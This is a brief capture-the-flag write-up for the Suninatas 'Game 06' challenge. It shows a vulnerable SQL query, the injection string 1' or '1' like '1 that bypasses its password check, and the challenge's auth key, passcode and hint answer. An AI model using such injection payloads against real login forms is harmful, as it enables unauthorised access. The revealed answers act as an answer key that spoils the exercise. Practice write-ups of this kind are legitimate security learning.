Suninatas Game 06

Posted on Edited on In Views: Disqus:

challenges

Game 06

Vulnerability: SQL Injection

Attack Vector

1
2
select szPwd from T_Web13 where
nIdx = '3' and szPwd = '"&pwd&"'

Inject with 1' or '1' like '1:

1
2
select szPwd from T_Web13 where
nIdx = '3' and szPwd = '1' or '1' like '1'

This bypasses the password check by making the condition always true.

Success Response

1
2
3
4
Congratulation!!
auth_key is suninatastopofworld!

Now, you can read this article.

Next challenge URL: http://suninatas.com/challenge/web06/view.asp?idx=3&num=3&passcode=wkdrnlwnd

Hint form:

1
<form method="post" name="KEY_HINT" action="Rome's First Emperor"></form>
Augustus